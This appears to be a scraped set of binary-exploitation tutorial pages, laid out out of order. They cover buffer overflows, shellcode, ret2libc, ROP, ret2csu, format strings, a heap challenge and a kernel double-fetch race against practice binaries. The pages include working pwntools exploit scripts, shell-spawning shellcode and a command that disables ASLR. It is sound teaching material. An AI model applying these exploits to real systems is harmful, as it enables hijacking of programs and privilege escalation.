The very simplest of possible GOT-overwrite binaries.
Infinite loop which takes in your input and prints it out to you using printf - no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
Exploitation
As per usual, set it all up
Now, to do the %n overwrite, we need to find the offset until we start reading the buffer.
Looks like it's the 5th.
Yes it is!
Now, next time printf gets called on your input it'll actually be system!
If the buffer is restrictive, you can always send /bin/sh to get you into a shell and run longer commands.
Final Exploit
64-bit
You'll never guess. That's right! You can do this one by yourself.
ASLR Enabled
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously.
ret2csu is a technique for populating registers when there is a lack of gadgets. More information can be found in the original paper, but a summary is as follows:
When an application is dynamically compiled (compiled with libc linked to it), there is a selection of functions it contains to allow the linking. These functions contain within them a selection of gadgets that we can use to populate registers we lack gadgets for, most importantly __libc_csu_init, which contains the following two gadgets:
The second might not look like a gadget, but if you look it calls r15 + rbx*8. The first gadget chain allows us to control both r15 and rbx in that series of huge pop operations, meaning whe can control where the second gadget calls afterwards.
Note it's call qword [r15 + rbx*8], not call qword r15 + rbx*8. This means it'll calculate r15 + rbx*8 then go to that memory address, read it, and call that value. This mean we have to find a memory address that contains where we want to jump.
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX and RSI registers (which are important for parameters) via the second gadget, then jump wherever we wish by simply controlling r15 and rbx to workable values.
This means we can potentially pull off syscalls for execve, or populate parameters for functions such as write().
You may wonder why we would do something like this if we're linked to libc - why not just read the GOT? Well, some functions - such as write() - require three parameters (and at least 2), so we would require ret2csu to populate them if there was a lack of gadgets.
0x004011a2 5b pop rbx
0x004011a3 5d pop rbp
0x004011a4 415c pop r12
0x004011a6 415d pop r13
0x004011a8 415e pop r14
0x004011aa 415f pop r15
0x004011ac c3 ret
heap0
http://exploit.education/phoenix/heap-zero/
Source
Luckily it gives us the source:
Analysis
So let's analyse what it does:
Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
The weakness here is clear - it runs a random address on the heap. Our input is copied there after the value is set and there's no bound checking whatsoever, so we can overrun it easily.
Regular Execution
Let's check out the heap in normal conditions.
We'll break right after the strcpy and see how it looks.
If we want, we can check the contents.
So, we can see that the function address is there, after our input in memory. Let's work out the offset.
Working out the Offset
Since we want to work out how many characters we need until the pointer, I'll just use a .
Let's break on and after the strcpy. That way we can check the location of the pointer then immediately read it and calculate the offset.
So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.
radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.
Notice we overwrote the size field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060).
So, fairly simple - 80 characters, then the address of winner.
Exploit
We need to remove the null bytes because argv doesn't allow them
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct data {
char name[64];
};
struct fp {
void (*fp)();
char __pad[64 - sizeof(unsigned long)];
};
void winner() {
printf("Congratulations, you have passed this level\n");
}
void nowinner() {
printf(
"level has not been passed - function pointer has not been "
"overwritten\n");
}
int main(int argc, char **argv) {
struct data *d;
struct fp *f;
if (argc < 2) {
printf("Please specify an argument to copy :-)\n");
exit(1);
}
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
strcpy(d->name, argv[1]);
printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
fflush(stdout);
f->fp();
return 0;
}
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.
In order to update authenticated, we have to write() to the kernel module. What we attempt to write it compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!
Interacting
Let's first try and interact with the kernel by reading from it.
Make sure you sudo chmod 666 /dev/authentication!
We'll start by opening the device and reading from it.
Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.
After compiling, we get that we are not authenticated:
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!
It works!
Amazing! Now for something really important:
The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).
Final Code
Challenge - IOCTL
So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practise.
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0 to the ID, and another that writes another value - e.g. 900 - and then calling write. The aim is for the thread that switches to 0 to sync up so perfectly that the switch occurs inbetween the ID check and the ID "assignment".
Analysis
If we check the source, we can see that there is no msleep any longer:
Exploitation
Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:
Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:
If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).
Compile the exploit and run it, we get the desired result:
Look how quick that was! Insane - two fails, then a success!
Race Analysis
You might be wondering how tight the race window can be for exploitation - well, had a race of two assembly instructions:
The dereferences [rbx] have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!
Compiling, Customising and booting the Kernel
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.
Prerequisites
There may be other requirements, I just already had them. Check for the full list.
The Kernel
Cloning
Use --depth 1 to only get the last commit.
Customise
Remove the current compilation configurations, as they are quite complex for our needs
Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.
We create a kconfig file with the options we want to enable. An example is the following:
Explanation of Options
CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - simultaneous multiprocessing; allows the kernel to run on multiple cores
In order to update the minimal .config with these options, we use the provided merge_config.sh script:
Building
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.
Kernel Modules
, we use the following Makefile structure:
To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:
The module is now compiled for the specific kernel version!
Booting the Kernel in a Virtual Machine
References
Creating the File System and Executables
We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use , an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.
We will download and extract busybox; you can find the latest version .
We also create an output folder for compiled versions.
Now compile it statically. We're going to use the menuconfig option, so we can make some choices.
Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
Now we make the file system.
The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:
Make it executable
Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.
The -not -name *.cpio is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises
If we want to extract the cpio archive (say, during a CTF) we can use this command:
Loading it with QEMU
Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:
Explanation of Flags
-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio
Once we make this executable and run it, we get loaded into a VM!
User Accounts
Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:
This is because /etc/passwd and /etc/group don't exist, so we can just create those!
Loading the Kernel Module
The final step is, of course, the loading of the kernel module. I will be using the module from my section for this step.
First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).
Here I am assuming that the major number of the double_fetch module is 253.
Why am I doing that?
If we load into a shell and run cat /proc/devices, we can see that double_fetch
Compiling a Different Kernel Version
If we want to compile a kernel version that is not the latest, we'll dump all the :
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables support for loading an initial RAM disk
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to allow better debugging
CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - TODO
CONFIG_EMBEDDED - disables optimizations/features for embedded systems
CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space
- provide the file system
-append ... - basic features; in the future, this flag is also used to set protections
console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)
quiet - Only showing critical messages from the kernel
loglevel=3 - Only show error messages and higher-priority messages
oops=panic - Make the kernel panic immediately on an oops (kernel error)
-monitor /dev/null - Disable the QEMU monitor
-nographic - Disable GUI, operate in headless mode (faster)
no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).
is loaded with major number
253
every time. I can't find any way to load this in
without
guessing the major number, so we're sticking with this for now - please get in touch if you find one!
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
printk("[Double-Fetch] Attempting login...");
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
// now we write the cred struct to the module
res_id = write(fd, &creds, 0);
// if res_id is 0, stop the race
if (!res_id) {
puts("[+] ID is 0!");
break;
}
}
~ $ ./exploit
FD: 3
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race
; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax
$ make allnoconfig
YACC scripts/kconfig/parser.tab.[ch]
HOSTCC scripts/kconfig/lexer.lex.o
HOSTCC scripts/kconfig/menu.o
HOSTCC scripts/kconfig/parser.tab.o
HOSTCC scripts/kconfig/preprocess.o
HOSTCC scripts/kconfig/symbol.o
HOSTCC scripts/kconfig/util.o
HOSTLD scripts/kconfig/conf
#
# configuration written to .config
#
CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y
CONFIG_PCI=y
# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y
# This is for /dev file system.
CONFIG_DEVTMPFS=y
# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y
CONFIG_MODULES=y
CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y
CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_USERFAULTFD=y
#!/bin/sh
insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch
mount -t proc none /proc
mount -t sysfs none /sys
mknod -m 666 /dev/ttyS0 c 4 64
setsid /bin/cttyhack setuidgid 1000 /bin/sh
$ git fetch --tags
$ git checkout v5.11
De Bruijn Sequences
The better way to calculate offsets
De Bruijn sequences of order n is simply a sequence where no string of n characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
Generating the Pattern
Again, radare2 comes with a nice command-line tool (called ragg2) that can generate it for us. Let's create a sequence of length 100.
The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.
Using the Pattern
Now we have the pattern, let's just input it in radare2 when prompted for input, make it crash and then calculate how far along the sequence the EIP is. Simples.
The address it crashes on is 0x41534141; we can use radare2's in-built wopO command to work out the offset.
Awesome - we get the correct value!
We can also be lazy and not copy the value.
The backticks means the dr eip is calculated first, before the wopO is run on the result of it.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
[0x41534141]> wopO 0x41534141
52
[0x41534141]> wopO `dr eip`
52
Stack
Introduction
An introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilising them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
The binary has two files - source.c and vuln; the latter is an ELF file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2 to analyse the behaviour of the binary when functions are called.
The -d runs it while the -A performs analysis. We can disassemble main with
s main seeks (moves) to main, while pdf stands for Print Disassembly Function (literally just disassembles it).
The call to unsafe is at 0x080491bb, so let's break there.
db stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply somewhere which, when reached, pauses the program for you to run other commands. Now we run dc for debug continue; this just carries on running the file.
It should break before unsafe is called; let's analyse the top of the stack now:
pxw tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first value here, which is 0xf7efe000. This value is stored at the top of the stack, as ESP points to the top of the stack - in this case, that is 0xff984af0.
Note that the value 0xf7efe000 is random - it's an artefact of previous processes that have used that part of the stack. The stack is never wiped, it's just marked as usable, so before data actually gets put there the value is completely dependent on your system.
Let's move one more instruction with ds, debug step, and check the stack again. This will execute the call sym.unsafe instruction.
Huh, something's been pushed onto the top of the stack - the value 0x080491c0. This looks like it's in the binary - but where? Let's look back at the disassembly from before:
We can see that 0x080491c0 is the memory address of the instruction after the call to unsafe. Why? This is how the program knows where to return to after unsafe() has finished.
Weaknesses
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe and break on the ret instruction; ret is the equivalent of pop eip, which will get the saved return pointer we just analysed on the stack into the eip register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec.
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret, the value popped into eip won't be in the previous function but rather 0x41414141. Let's check with ds.
And look at the new prompt - 0x41414141. Let's run dr eip to make sure that's the value in eip:
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc.
radare2 is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault, which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as fgets(); gets() is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets() is always something you should check out in a program. It is also possible to give fgets() the wrong parameters, meaning it still takes in too many characters.
Summary
When a function calls another function, it
pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets() can prevent such easy overflow, but you should check how much is actually being read.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
Shellcode
Running your own code
In real exploits, it's not particularly likely that you will have a win() function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
Disabling ASLR
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomising certain aspects of memory (we will talk about it in much more detail later). This randomisation can make shellcode exploits like the one we're about to do more less reliable, so we'll be disabling it for now .
Again, you should never run commands if you don't know what they do
Finding the Buffer in Memory
Let's debug vuln() using radare2 and work out where in memory the buffer starts; this is where we want to point the return pointer to.
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets() and find the exact address.
It appears to be at 0xffffcfd4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Finding the Padding
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.
The padding is 312 bytes.
Putting it all together
In order for the shellcode to be correct, we're going to set context.binary to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.
We can use just process() because once context.binary is set it is assumed to use that process
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
Yup, that's it. Now let's send it off and use p.interactive(), which enables us to communicate to the shell.
If you're getting an EOFError, print out the shellcode and try to find it in memory - the stack address may be wrong
And it works! Awesome.
Final Exploit
Summary
We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
ret2win
The most basic binexp challenge
A ret2win is simply a binary where there is a win() function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple things:
The padding until we begin to overwrite the return pointer (EIP)
What value we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
Finding the Padding
This can be found using simple trial and error; if we send a variable numbers of characters, we can use the Segmentation Fault message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.
We get an offset of 52 bytes.
Finding the Address
Now we need to find the address of the flag() function in the binary. This is simple.
afl stands for Analyse Functions List
The flag() function is at 0x080491c3.
Using the Information
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the As that we sent became 0x41 - which is the ASCII code of A. So the solution is simple - let's just find the characters with ascii codes 0x08, 0x04, 0x91 and 0xc3.
This is a lot simpler than you might think, because we can specify them in python as hex:
And that makes it much easier.
Putting it Together
Now we know the padding and the value, let's exploit the binary! We can use to interface with the binary (check out the for a more in-depth look).
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put in a pause() to give us time to attach radare2 onto the process.
Now let's run the script with python3 exploit.py and then open up a new terminal window.
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe() and read the value of the return pointer.
0xc3910408 - look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is . Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (), and most binaries you will come across are little-endian. As far as we're concerned, the byte are stored in reverse order in little-endian executables.
Finding the Endianness
radare2 comes with a nice tool called rabin2 for binary analysis:
So our binary is little-endian.
Accounting for Endianness
The fix is simple - reverse the address (you can also remove the pause())
If you run this now, it will work:
And wham, you've called the flag() function! Congrats!
Pwntools and Endianness
Unsurprisingly, you're not the first person to have thought "could they possibly make endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!
becomes
Much simpler, right?
The only caveat is that it returns bytes rather than a string, so you have to make the padding a byte string:
Otherwise you will get a
Final Exploit
Cybersecurity Notes
Welcome to my blog! There's a lot here and it's a bit spread out, so here's a guide:
If you're looking for my binary exploitation notes, you're in the right place! Here I make notes on most of the things I learn, and also provide vulnerable binaries to allow you to have a go yourself. Most "common" stack techniques are mentioned along with some super introductory heap; more will come soonâ„¢.
There is the odd set of things on reverse engineering, cryptography and blockchain security too, as well as writeups
All of my non-cryptography maths notes can be found on Notion . I realise having it in multiple locations is annoying, but maths support in Notion is just wayyy better. Like so much better. Sorry.
If you'd like to find me elsewhere, I'm usually down as ir0nstone. The account you'd actually be interested in seeing is likely .
If this resource has been helpful to you, please consider :)
And, of course, thanks to GitBook for all of their support :)
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switch out the p32() for p64() as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ r2 -d -A vuln
[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
log.info(p.clean())
p.sendline(payload)
p.interactive()
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.clean() # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
from pwn import *
p = process('./vuln')
payload = b'A' * 52
payload += '\x08\x04\x91\xc3'
log.info(p.clean())
pause() # add this in
p.sendline(payload)
log.info(p.clean())
r2 -d -A $(pidof vuln)
[0x08049172]> db 0x080491aa
[0x08049172]> dc
<< press any button on the exploit terminal window >>
hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c 0xc3910408 [...]
[...]
$ rabin2 -I vuln
[...]
endian little
[...]
payload += '\x08\x04\x91\xc3'[::-1]
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
payload += '\x08\x04\x91\xc3'[::-1]
payload += p32(0x080491c3)
payload = b'A' * 52 # Notice the "b"
TypeError: can only concatenate str (not "bytes") to str
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
log.info(p.clean()) # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
NOPs
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. Which makes then very useful for shellcode exploits, because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of them, it'll simply keep doing no instructions until it reaches our actual shellcode. This allows us a greater margin of error as a shift of a few bytes forward or backwards won't really affect it, it'll just run a different number of NOP instructions - which have the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90.
The NOP instruction actually used to stand for XCHG EAX, EAX, which does effectively nothing. You can read a bit more about it .
Updating our Shellcode Exploit
We can make slight changes to our exploit to do two things:
Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location my be different.
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90 in certain architectures, and if you need others you can use pwntools:
Return-Oriented Programming
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command, such as cat flag.txt, and then pass it as a parameter to system, it will execute that command and return the output. A more dangerous command is /bin/sh, which when run by system gives the attacker a shell much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
Exploiting Calling Conventions
Utilising Calling Conventions
32-bit
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = b'\x90' * 240 # The NOPs
payload += asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half nop length
log.info(p.clean())
p.sendline(payload)
p.interactive()
nop = asm(shellcraft.nop())
Everything after the address of flag() will be part of the stack frame for the next function as it is expected to be there - just instead of using push instructions we just overwrote them manually.
64-bit
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi and rsi as we have two parameters).
We have to fill the registers before the function is called
A ret2libc is based off the system function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.
And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?
To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system and /bin/sh. To understand the general theory, we will start with it disabled.
Manual Exploitation
Getting Libc and its base
Fortunately Linux has a command called ldd for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.
We need libc.so.6, so the base address of libc is 0xf7dc2000.
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.
Getting the location of system()
To call system, we obviously need its location in memory. We can use the readelf command for this.
The -s flag tells readelf to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00.
Getting the location of /bin/sh
Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
-a tells it to scan the entire file; -t x tells it to output the offset in hex.
32-bit Exploit
64-bit Exploit
Repeat the process with the libc linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.
Automating with Pwntools
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
The 64-bit looks essentially the same.
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.
from pwn import *
p = process('./vuln-32')
payload = b'A' * 52 # Padding up to EIP
payload += p32(0x080491c7) # Address of flag()
payload += p32(0x0) # Return address - don't care if crashes when done
payload += p32(0xdeadc0de) # First parameter
payload += p32(0xc0ded00d) # Second parameter
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
from pwn import *
p = process('./vuln-64')
POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9
payload = b'A' * 56 # Padding
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(0xdeadc0de) # value into rdi -> first param
payload += p64(POP_RSI_R15) # pop rsi; pop r15; ret
payload += p64(0xc0ded00d) # value into rsi -> first param
payload += p64(0x0) # value into r15 -> not important
payload += p64(0x40116f) # Address of flag()
payload += p64(0x0)
